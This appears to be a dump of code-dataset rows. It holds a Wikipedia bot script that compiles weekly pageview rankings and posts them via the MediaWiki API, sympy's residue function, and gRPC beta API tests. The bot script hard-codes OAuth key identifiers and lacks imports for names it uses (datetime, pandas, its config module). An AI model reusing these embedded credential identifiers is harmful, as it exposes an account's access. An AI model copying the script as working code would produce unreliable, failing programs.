import requests
from requests_oauthlib import OAuth1
from urllib import parse
rt_header = """== Popular articles {date7} to {date1} ==
Last updated on ~~~~~
{{| class="wikitable sortable"
!Rank
!Article
!Total weekly views
!Days in top 1k this week
"""
footer = """|}
<!--IMPORTANT add all categories to the top section of the page, not here. Otherwise, they will get removed when the bot runs tomorrow! -->
"""
rt_row = """|-
|{rank}
|[[w:{title}|{title}]]
|{week_total}
|{days_in_topk}
"""
def get_yesterdates(lookback=7):
"""
Accepts a lookback parameter of how many days ago to gather data for (not including the current day per UTC time)
Defaults to seven days lookback (val must be at least 1)
Returns a list of dictionaries with the previous n dates (exclusive), in reverse chronological order
"""
date_range = []
for d in range(1, lookback + 1):
date_parts = {'year': datetime.strftime(datetime.now() - timedelta(d), '%Y'),
'month' : datetime.strftime(datetime.now() - timedelta(d), '%m'),
'day': datetime.strftime(datetime.now() - timedelta(d), '%d'),
}
date_parts['display_date'] = date_parts['year'] + "-" + date_parts['month'] + "-" + date_parts['day']
date_parts['api_date'] = date_parts['year'] + date_parts['month'] + date_parts['day'] + "00"
date_range.append(date_parts)
return date_range
def get_all_topk_articles(day_range):
"""
Accepts a list of dicts with year, month, and day values
Returns a dictionary (article titles as keys)
with all articles that were in the topk list during those dates
and the pageview counts for each of the dates the article appeared in the topk
Example query: https://wikimedia.org/api/rest_v1/metrics/pageviews/top/en.wikipedia.org/all-access/2020/03/31
"""
q_template= "https://wikimedia.org/api/rest_v1/metrics/pageviews/top/en.wikipedia.org/all-access/{year}/{month}/{day}"
all_articles = {}
for day_val in day_range:
q_string = q_template.format(**day_val)
r = requests.get(
url = q_string,
headers = {'User-Agent': "hostbot (https://wikitech.wikimedia.org/wiki/Tool:HostBot, jonnymorgan.esq@gmail.com)"},
)
# print(r.headers)
# print(r.text)
# print(r.url)
response = r.json()
# print(response)
# response = requests.get(q_string).json()
top_articles_list = response['items'][0]['articles']
for ar in top_articles_list:
if ar['article'] in all_articles.keys():
all_articles[ar['article']].update({day_val['api_date'] : ar['views']})
else:
all_articles.update({ar['article'] : {day_val['api_date'] : ar['views']}})
return all_articles
def ar_days_in_topk(day_range, ar_dict):
"""
Accepts a day range dictionary
And a nested dict with articles as keys
And as values varying numbers of k,v pairs
Returns the article dictionary with a new k,v pair value
that counts the number of existing k,v pairs in that article dict
"""
for k,v in ar_dict.items():
v['topk_days'] = len(ar_dict[k])
return ar_dict
def get_daily_non_topk_counts(day_range, ar_dict):
"""
Accepts a list of dicts with year, month, and day values
And a dict with article titles as keys dicts with different numbers of k,v pairs as values
Returns a dict that contains for each article the difference between the length of the day range
And the number of keys in each dict
Example query: https://wikimedia.org/api/rest_v1/metrics/pageviews/per-article/en.wikipedia.org/all-access/user/2009_swine_flu_pandemic/daily/2020032500/2020033100
"""
q_template= "https://wikimedia.org/api/rest_v1/metrics/pageviews/per-article/en.wikipedia.org/all-access/user/{article}/daily/{day7}/{day1}"
for k,v in ar_dict.items():
if len(v) < 8: #if this article didn't spend all week among the top 1000
safe_title = parse.quote(k, safe='') #in case there are weird chars in title
q_string = q_template.format(article = safe_title, day7 = day_range[6]['api_date'], day1 = day_range[0]['api_date'])
# print(q_string)
r = requests.get(
url = q_string,
headers = {'User-Agent': "hostbot (https://wikitech.wikimedia.org/wiki/Tool:HostBot, jonnymorgan.esq@gmail.com)"},
)
# print(r.headers)
# print(r.text)
# print(r.url)
response = r.json()
# print(response)
# response = requests.get(q_string).json()
ar_views = response['items']
# print(ar_views)
for d in ar_views:
if d['timestamp'] not in v.keys():
v.update({d['timestamp'] : d['views']})
else:
pass
return ar_dict
def fill_null_date_vals(day_range, ar_dict):
"""
Accepts a list of dicts with year, month, and day values
And a dict with article titles as keys and gaps in the date keys
Returns the article dictionary with each sub-dict fully populated
With pageview values for all dates in range, even if val is 0
"""
#https://www.geeksforgeeks.org/dictionary-methods-in-python-set-2-update-has_key-fromkeys/
for day_val in week_of_days:
for v in ar_dict.values():
if len(v) < 8: #if we still don't have any pageviews for some days
v.setdefault(day_val['api_date'], 0) #adds a key with val of 0 if no key present
else:
pass
return ar_dict
def format_row(rank, title, week_total, days_in_topk, row_template):
table_row = {'rank': rank,
'title' : title.replace("_"," "),
'week_total' : week_total,
'days_in_topk' : days_in_topk
}
row = row_template.format(**table_row)
# print(row)
return(row)
def get_token(auth1):
"""
Accepts an auth object for a user
Returns an edit token for the specified wiki
"""
result = requests.get(
url="https://en.wikipedia.org/w/api.php", #TODO add to config
params={
'action': "query",
'meta': "tokens",
'type': "csrf",
'format': "json"
},
headers={'User-Agent': "hostbot (https://wikitech.wikimedia.org/wiki/Tool:HostBot, jonnymorgan.esq@gmail.com)"}, #TODO add to config
auth=auth1,
).json()
# print(result)
edit_token = result['query']['tokens']['csrftoken']
# print(edit_token)
return(edit_token)
def publish_report(output, edit_sum, auth1, edit_token):
"""
Accepts the page text, credentials and edit token
Publishes the formatted page text to the specified wiki
"""
response = requests.post(
url = "https://en.wikipedia.org/w/api.php", #TODO add to config
data={
'action': "edit",
'title': "User:HostBot/Top_1000_report", #TODO add to config
'section': "1",
'summary': edit_sum, #TODO add to config
'text': output,
'bot': 1,
'token': edit_token,
'format': "json"
},
headers={'User-Agent': "hostbot (https://wikitech.wikimedia.org/wiki/Tool:HostBot, jonnymorgan.esq@gmail.com)"}, #TODO add to config
auth=auth1
)
if __name__ == "__main__":
auth1 = OAuth1("b5d87cbe96174f9435689a666110159c",
hb_config.client_secret,
"ca1b222d687be9ac33cfb49676f5bfd2",
hb_config.resource_owner_secret)
#get previous week's date info for query and reporting
week_of_days = get_yesterdates(lookback=7)
#get all of the articles that appeared on the topk list that week
all_articles = get_all_topk_articles(week_of_days)
#get counts for all days each article was in the top 1000
# all_articles = get_daily_topk_counts(week_of_days, all_articles)
#add number of days each article appears in the topk list. could do this in first function too
all_articles = ar_days_in_topk(len(week_of_days), all_articles)
#add page counts for days the article was not in the topk list
all_articles = get_daily_non_topk_counts(week_of_days, all_articles)
all_articles = fill_null_date_vals(week_of_days, all_articles)
#now we're ready to make a dataframe!
df_aa = pd.DataFrame.from_dict(all_articles, orient="index")
#sum across the daily counts
#https://stackoverflow.com/questions/25748683/pandas-sum-dataframe-rows-for-given-columns
df_aa['week_total'] = df_aa.sum(axis=1)
#make the title NOT the index. Should do this when creating the frame, instead
df_aa.reset_index(inplace=True)
#rename title column. Should do this when creating the frame, instead
df_aa.rename(columns = {'index' : 'title'}, inplace=True)
#remove blacklisted titles--pages we don't care about, for these purposes. Although... we could keep them I guess.
blacklist = ["Main_Page", "Special:", "Category:", "Portal:", "Template:", "Wikipedia:", "Talk:", "User:", "_talk:", "Help:", "File:", "United_States_Senate",]
df_aa = df_aa[~df_aa['title'].str.contains('|'.join(blacklist))]
#sort by weekly views
df_aa.sort_values('week_total', ascending=False, inplace=True)
#add rank column based on weekly views
new_rank = range(1, len(df_aa)+1)
df_aa['rank'] = list(new_rank)
#reset the index to reflect the final ranking, dropping the existing index this time
df_aa.reset_index(drop=True, inplace=True)
#start and end dates for header and edit comment
header_dates = {'date1' : week_of_days[0]['display_date'],
'date7' : week_of_days[6]['display_date']
}
#format the header template
header = rt_header.format(**header_dates)
report_rows = [format_row(a, b, c, d, rt_row) #this is messy
for a, b, c, d
in zip(df_aa['rank'],
df_aa['title'],
df_aa['week_total'],
df_aa['topk_days'],
)]
rows_wiki = ''.join(report_rows)
output = header + rows_wiki + footer
# print(output)
edit_token = get_token(auth1)
edit_sum = "Popular articles from {date7} to {date1}".format(**header_dates)
publish_report(output, edit_sum, auth1, edit_token)
| mit |
jerli/sympy | sympy/series/residues.py | 84 | 2386 | """
This module implements the Residue function and related tools for working
with residues.
"""
from __future__ import print_function, division
from sympy import sympify
from sympy.utilities.timeutils import timethis
@timethis('residue')
def residue(expr, x, x0):
"""
Finds the residue of ``expr`` at the point x=x0.
The residue is defined as the coefficient of 1/(x-x0) in the power series
expansion about x=x0.
Examples
========
>>> from sympy import Symbol, residue, sin
>>> x = Symbol("x")
>>> residue(1/x, x, 0)
1
>>> residue(1/x**2, x, 0)
0
>>> residue(2/sin(x), x, 0)
2
This function is essential for the Residue Theorem [1].
References
==========
1. http://en.wikipedia.org/wiki/Residue_theorem
"""
# The current implementation uses series expansion to
# calculate it. A more general implementation is explained in
# the section 5.6 of the Bronstein's book {M. Bronstein:
# Symbolic Integration I, Springer Verlag (2005)}. For purely
# rational functions, the algorithm is much easier. See
# sections 2.4, 2.5, and 2.7 (this section actually gives an
# algorithm for computing any Laurent series coefficient for
# a rational function). The theory in section 2.4 will help to
# understand why the resultant works in the general algorithm.
# For the definition of a resultant, see section 1.4 (and any
# previous sections for more review).
from sympy import collect, Mul, Order, S
expr = sympify(expr)
if x0 != 0:
expr = expr.subs(x, x + x0)
for n in [0, 1, 2, 4, 8, 16, 32]:
if n == 0:
s = expr.series(x, n=0)
else:
s = expr.nseries(x, n=n)
if s.has(Order) and s.removeO() == 0:
# bug in nseries
continue
if not s.has(Order) or s.getn() >= 0:
break
if s.has(Order) and s.getn() < 0:
raise NotImplementedError('Bug in nseries?')
s = collect(s.removeO(), x)
if s.is_Add:
args = s.args
else:
args = [s]
res = S(0)
for arg in args:
c, m = arg.as_coeff_mul(x)
m = Mul(*m)
if not (m == 1 or m == x or (m.is_Pow and m.exp.is_Integer)):
raise NotImplementedError('term of unexpected form: %s' % m)
if m == 1/x:
res += c
return res
| bsd-3-clause |
chrisdunelm/grpc | src/python/grpcio_tests/tests/unit/beta/_beta_features_test.py | 13 | 13790 | # Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests Face interface compliance of the gRPC Python Beta API."""
import threading
import unittest
from grpc.beta import implementations
from grpc.beta import interfaces
from grpc.framework.common import cardinality
from grpc.framework.interfaces.face import utilities
from tests.unit import resources
from tests.unit.beta import test_utilities
from tests.unit.framework.common import test_constants
_SERVER_HOST_OVERRIDE = 'foo.test.google.fr'
_PER_RPC_CREDENTIALS_METADATA_KEY = b'my-call-credentials-metadata-key'
_PER_RPC_CREDENTIALS_METADATA_VALUE = b'my-call-credentials-metadata-value'
_GROUP = 'group'
_UNARY_UNARY = 'unary-unary'
_UNARY_STREAM = 'unary-stream'
_STREAM_UNARY = 'stream-unary'
_STREAM_STREAM = 'stream-stream'
_REQUEST = b'abc'
_RESPONSE = b'123'
class _Servicer(object):
def __init__(self):
self._condition = threading.Condition()
self._peer = None
self._serviced = False
def unary_unary(self, request, context):
with self._condition:
self._request = request
self._peer = context.protocol_context().peer()
self._invocation_metadata = context.invocation_metadata()
context.protocol_context().disable_next_response_compression()
self._serviced = True
self._condition.notify_all()
return _RESPONSE
def unary_stream(self, request, context):
with self._condition:
self._request = request
self._peer = context.protocol_context().peer()
self._invocation_metadata = context.invocation_metadata()
context.protocol_context().disable_next_response_compression()
self._serviced = True
self._condition.notify_all()
return
yield # pylint: disable=unreachable
def stream_unary(self, request_iterator, context):
for request in request_iterator:
self._request = request
with self._condition:
self._peer = context.protocol_context().peer()
self._invocation_metadata = context.invocation_metadata()
context.protocol_context().disable_next_response_compression()
self._serviced = True
self._condition.notify_all()
return _RESPONSE
def stream_stream(self, request_iterator, context):
for request in request_iterator:
with self._condition:
self._peer = context.protocol_context().peer()
context.protocol_context().disable_next_response_compression()
yield _RESPONSE
with self._condition:
self._invocation_metadata = context.invocation_metadata()
self._serviced = True
self._condition.notify_all()
def peer(self):
with self._condition:
return self._peer
def block_until_serviced(self):
with self._condition:
while not self._serviced:
self._condition.wait()
class _BlockingIterator(object):
def __init__(self, upstream):
self._condition = threading.Condition()
self._upstream = upstream
self._allowed = []
def __iter__(self):
return self
def __next__(self):
return self.next()
def next(self):
with self._condition:
while True:
if self._allowed is None:
raise StopIteration()
elif self._allowed:
return self._allowed.pop(0)
else:
self._condition.wait()
def allow(self):
with self._condition:
try:
self._allowed.append(next(self._upstream))
except StopIteration:
self._allowed = None
self._condition.notify_all()
def _metadata_plugin(context, callback):
callback([(_PER_RPC_CREDENTIALS_METADATA_KEY,
_PER_RPC_CREDENTIALS_METADATA_VALUE)], None)
class BetaFeaturesTest(unittest.TestCase):
def setUp(self):
self._servicer = _Servicer()
method_implementations = {
(_GROUP, _UNARY_UNARY):
utilities.unary_unary_inline(self._servicer.unary_unary),
(_GROUP, _UNARY_STREAM):
utilities.unary_stream_inline(self._servicer.unary_stream),
(_GROUP, _STREAM_UNARY):
utilities.stream_unary_inline(self._servicer.stream_unary),
(_GROUP, _STREAM_STREAM):
utilities.stream_stream_inline(self._servicer.stream_stream),
}
cardinalities = {
_UNARY_UNARY: cardinality.Cardinality.UNARY_UNARY,
_UNARY_STREAM: cardinality.Cardinality.UNARY_STREAM,
_STREAM_UNARY: cardinality.Cardinality.STREAM_UNARY,
_STREAM_STREAM: cardinality.Cardinality.STREAM_STREAM,
}
server_options = implementations.server_options(
thread_pool_size=test_constants.POOL_SIZE)
self._server = implementations.server(
method_implementations, options=server_options)
server_credentials = implementations.ssl_server_credentials([
(
resources.private_key(),
resources.certificate_chain(),
),
])
port = self._server.add_secure_port('[::]:0', server_credentials)
self._server.start()
self._channel_credentials = implementations.ssl_channel_credentials(
resources.test_root_certificates())
self._call_credentials = implementations.metadata_call_credentials(
_metadata_plugin)
channel = test_utilities.not_really_secure_channel(
'localhost', port, self._channel_credentials, _SERVER_HOST_OVERRIDE)
stub_options = implementations.stub_options(
thread_pool_size=test_constants.POOL_SIZE)
self._dynamic_stub = implementations.dynamic_stub(
channel, _GROUP, cardinalities, options=stub_options)
def tearDown(self):
self._dynamic_stub = None
self._server.stop(test_constants.SHORT_TIMEOUT).wait()
def test_unary_unary(self):
call_options = interfaces.grpc_call_options(
disable_compression=True, credentials=self._call_credentials)
response = getattr(self._dynamic_stub, _UNARY_UNARY)(
_REQUEST,
test_constants.LONG_TIMEOUT,
protocol_options=call_options)
self.assertEqual(_RESPONSE, response)
self.assertIsNotNone(self._servicer.peer())
invocation_metadata = [
(metadatum.key, metadatum.value)
for metadatum in self._servicer._invocation_metadata
]
self.assertIn((_PER_RPC_CREDENTIALS_METADATA_KEY,
_PER_RPC_CREDENTIALS_METADATA_VALUE),
invocation_metadata)
def test_unary_stream(self):
call_options = interfaces.grpc_call_options(
disable_compression=True, credentials=self._call_credentials)
response_iterator = getattr(self._dynamic_stub, _UNARY_STREAM)(
_REQUEST,
test_constants.LONG_TIMEOUT,
protocol_options=call_options)
self._servicer.block_until_serviced()
self.assertIsNotNone(self._servicer.peer())
invocation_metadata = [
(metadatum.key, metadatum.value)
for metadatum in self._servicer._invocation_metadata
]
self.assertIn((_PER_RPC_CREDENTIALS_METADATA_KEY,
_PER_RPC_CREDENTIALS_METADATA_VALUE),
invocation_metadata)
def test_stream_unary(self):
call_options = interfaces.grpc_call_options(
credentials=self._call_credentials)
request_iterator = _BlockingIterator(iter((_REQUEST,)))
response_future = getattr(self._dynamic_stub, _STREAM_UNARY).future(
request_iterator,
test_constants.LONG_TIMEOUT,
protocol_options=call_options)
response_future.protocol_context().disable_next_request_compression()
request_iterator.allow()
response_future.protocol_context().disable_next_request_compression()
request_iterator.allow()
self._servicer.block_until_serviced()
self.assertIsNotNone(self._servicer.peer())
self.assertEqual(_RESPONSE, response_future.result())
invocation_metadata = [
(metadatum.key, metadatum.value)
for metadatum in self._servicer._invocation_metadata
]
self.assertIn((_PER_RPC_CREDENTIALS_METADATA_KEY,
_PER_RPC_CREDENTIALS_METADATA_VALUE),
invocation_metadata)
def test_stream_stream(self):
call_options = interfaces.grpc_call_options(
credentials=self._call_credentials)
request_iterator = _BlockingIterator(iter((_REQUEST,)))
response_iterator = getattr(self._dynamic_stub, _STREAM_STREAM)(
request_iterator,
test_constants.SHORT_TIMEOUT,
protocol_options=call_options)
response_iterator.protocol_context().disable_next_request_compression()
request_iterator.allow()
response = next(response_iterator)
response_iterator.protocol_context().disable_next_request_compression()
request_iterator.allow()
self._servicer.block_until_serviced()
self.assertIsNotNone(self._servicer.peer())
self.assertEqual(_RESPONSE, response)
invocation_metadata = [
(metadatum.key, metadatum.value)
for metadatum in self._servicer._invocation_metadata
]
self.assertIn((_PER_RPC_CREDENTIALS_METADATA_KEY,
_PER_RPC_CREDENTIALS_METADATA_VALUE),
invocation_metadata)
class ContextManagementAndLifecycleTest(unittest.TestCase):
def setUp(self):
self._servicer = _Servicer()
self._method_implementations = {
(_GROUP, _UNARY_UNARY):
utilities.unary_unary_inline(self._servicer.unary_unary),
(_GROUP, _UNARY_STREAM):
utilities.unary_stream_inline(self._servicer.unary_stream),
(_GROUP, _STREAM_UNARY):
utilities.stream_unary_inline(self._servicer.stream_unary),
(_GROUP, _STREAM_STREAM):
utilities.stream_stream_inline(self._servicer.stream_stream),
}
self._cardinalities = {
_UNARY_UNARY: cardinality.Cardinality.UNARY_UNARY,
_UNARY_STREAM: cardinality.Cardinality.UNARY_STREAM,
_STREAM_UNARY: cardinality.Cardinality.STREAM_UNARY,
_STREAM_STREAM: cardinality.Cardinality.STREAM_STREAM,
}
self._server_options = implementations.server_options(
thread_pool_size=test_constants.POOL_SIZE)
self._server_credentials = implementations.ssl_server_credentials([
(
resources.private_key(),
resources.certificate_chain(),
),
])
self._channel_credentials = implementations.ssl_channel_credentials(
resources.test_root_certificates())
self._stub_options = implementations.stub_options(
thread_pool_size=test_constants.POOL_SIZE)
def test_stub_context(self):
server = implementations.server(
self._method_implementations, options=self._server_options)
port = server.add_secure_port('[::]:0', self._server_credentials)
server.start()
channel = test_utilities.not_really_secure_channel(
'localhost', port, self._channel_credentials, _SERVER_HOST_OVERRIDE)
dynamic_stub = implementations.dynamic_stub(
channel, _GROUP, self._cardinalities, options=self._stub_options)
for _ in range(100):
with dynamic_stub:
pass
for _ in range(10):
with dynamic_stub:
call_options = interfaces.grpc_call_options(
disable_compression=True)
response = getattr(dynamic_stub, _UNARY_UNARY)(
_REQUEST,
test_constants.LONG_TIMEOUT,
protocol_options=call_options)
self.assertEqual(_RESPONSE, response)
self.assertIsNotNone(self._servicer.peer())
server.stop(test_constants.SHORT_TIMEOUT).wait()
def test_server_lifecycle(self):
for _ in range(100):
server = implementations.server(
self._method_implementations, options=self._server_options)
port = server.add_secure_port('[::]:0', self._server_credentials)
server.start()
server.stop(test_constants.SHORT_TIMEOUT).wait()
for _ in range(100):
server = implementations.server(
self._method_implementations, options=self._server_options)
server.add_secure_port('[::]:0', self._server_credentials)
server.add_insecure_port('[::]:0')
with server:
server.stop(test_constants.SHORT_TIMEOUT)
server.stop(test_constants.SHORT_TIMEOUT)
if __name__ == '__main__':
unittest.main(verbosity=2)
| apache-2.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.